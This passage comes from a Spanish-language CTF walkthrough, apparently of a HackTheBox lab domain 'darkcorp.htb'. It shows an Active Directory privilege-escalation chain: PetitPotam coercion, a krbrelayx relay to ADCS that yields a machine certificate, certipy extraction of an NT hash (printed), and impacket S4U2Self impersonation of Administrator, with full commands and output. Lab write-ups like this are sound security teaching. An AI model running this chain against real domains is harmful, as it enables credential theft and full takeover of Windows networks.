  | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.20.2[\PIPE\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.2:445  ...  OK
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Aunque EfsRpcOpenFileRaw está parcheada, encuentra otra función sin parchear (EfsRpcEncryptFileSrv) y la explota exitosamente.

¿Qué hace PetitPotam?

• Se conecta a la máquina objetivo (172.16.20.2) mediante SMB
• Llama a funciones del servicio MS-EFSRPC
• Esto obliga a la máquina a autenticarse contra el nombre que especifiques

Capturando el certificado

En mi servidor con krbrelayx recibo la conexión:

[*] SMBD: Received connection from 10.129.232.7
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc-01.darkcorp.htb:443  ...  OK
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] SMBD: Received connection from 10.129.232.7
[*] CSR generated!
[*] Getting certificate...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc-01.darkcorp.htb:443  ...  OK
[*] HTTP server returned status code 200, treating as a successful login
[*] GOT CERTIFICATE! ID 6
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Skipping user WEB-01$ since attack was already performed
[*] Certificate successfully written to file
^C                                                                                                                                                                                            
┌──(.env)─(root㉿kali)-[/home/kali/Downloads/krbrelayx]
└─# ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  WEB-01.pfx

¿Por qué WEB-01$ y no svc_acc?

Esto es importante entenderlo bien. Cuando ejecutamos PetitPotam apuntando al registro DNS malicioso, no estamos forzando la autenticación de svc_acc, sino la de la cuenta máquina de WEB-01.

¿Por qué? Porque PetitPotam lo que hace es obligar a una máquina a autenticarse, no a un usuario. Cuando apuntas PetitPotam contra 172.16.20.2 (que es WEB-01), esa máquina es quien genera la autenticación Kerberos hacia el nombre DNS que le especificas. Y en Active Directory, cada máquina tiene su propia cuenta con el formato MAQUINA$, en este caso WEB-01$.

Entonces el flujo es:

• PetitPotam le dice a WEB-01 que se autentique contra nuestro registro DNS malicioso
• WEB-01 obedece y envía su autenticación Kerberos como WEB-01$
• krbrelayx captura esa autenticación y la relaea hacia ADCS
• ADCS emite un certificado válido para WEB-01$

¿Y por qué nos interesa la cuenta máquina y no svc_acc?

Porque las cuentas máquina en Active Directory por defecto tienen habilitada la delegación, lo que nos permite después abusar de S4U2Self para impersonar al Administrator. Con una cuenta de usuario normal como svc_acc eso no sería posible directamente.

En resumen, svc_acc fue nuestra llave para entrar al dominio DNS, pero WEB-01$ es la cuenta que nos da el poder real para escalar.

Lo que acaba de pasar:

1. La máquina se autenticó con Kerberos contra mí
2. krbrelayx relayó esa autenticación hacia ADCS
3. ADCS validó la autenticación como legítima
4. Generó un certificado de máquina válido para WEB-01$
5. krbrelayx lo guardó como WEB-01.pfx

Ahora tengo un certificado válido que puedo usar para autenticarme como la cuenta máquina WEB-01$.

Extrayendo el hash NT con el certificado

Uso certipy-ad para autenticarme con el certificado y extraer el hash NT

┌──(.env)─(root㉿kali)-[/home/kali/Downloads/krbrelayx]
└─# proxychains certipy-ad auth -pfx WEB-01.pfx -dc-ip 172.16.20.1 -ns 172.16.20.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*]     Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:88  ...  OK
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:88  ...  OK
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675

El certificado me permite autenticarme y mediante PKINIT (autenticación Kerberos con certificados), certipy extrae el hash NT de la cuenta máquina.

Impersonando al Administrator con S4U2Self

Aquí viene el golpe final. Con el hash de WEB-01$, puedo abusar de las extensiones de delegación de Kerberos S4U2Self para solicitar un ticket de servicio (ST) en nombre del usuario Administrator

┌──(.env)─(root㉿kali)-[/home/kali/Downloads/krbrelayx]
└─# proxychains impacket-getST -self 'DARKCORP.HTB/WEB-01$' -altservice 'cifs/web-01.darkcorp.htb' -dc-ip 172.16.20.1 -impersonate 'administrator' -hashes 'aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:88  ...  OK
[*] Impersonating administrator
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.20.1:88  ...  OK
[*] Changing service from WEB-01$@DARKCORP.HTB to cifs/web-01.darkcorp.htb@DARKCORP.HTB
[*] Saving ticket in administrator@cifs_web-01.darkcorp.htb@DARKCORP.HTB.ccache

¿Qué es S4U2Self?
Es una extensión de Kerberos que permite a un servicio solicitar un ticket para cualquier usuario hacia sí mismo, incluso si ese usuario nunca se autenticó directamente. Diseñado para delegation, pero explotable para impersonación.

Parámetros clave:

• -self: Usa S4U2Self (solicitar ticket para otro usuario)
• -impersonate 'administrator': Usuario a suplantar
• -altservice 'cifs/web-01.darkcorp.htb': Servicio destino

Ya con el ticket Kerberos del Administrator para el servicio CIFS de WEB-01, tengo control total sobre esa máquina. CIFS es el protocolo de compartición de archivos de Windows, así que con un ticket válido como Administrator sobre este servicio puedo autenticarme, ejecutar comandos remotamente, leer y escribir archivos y acceder a cualquier recurso compartido de esa máquina sin restricciones.

Diagrama del flujo del Krbrelay Attack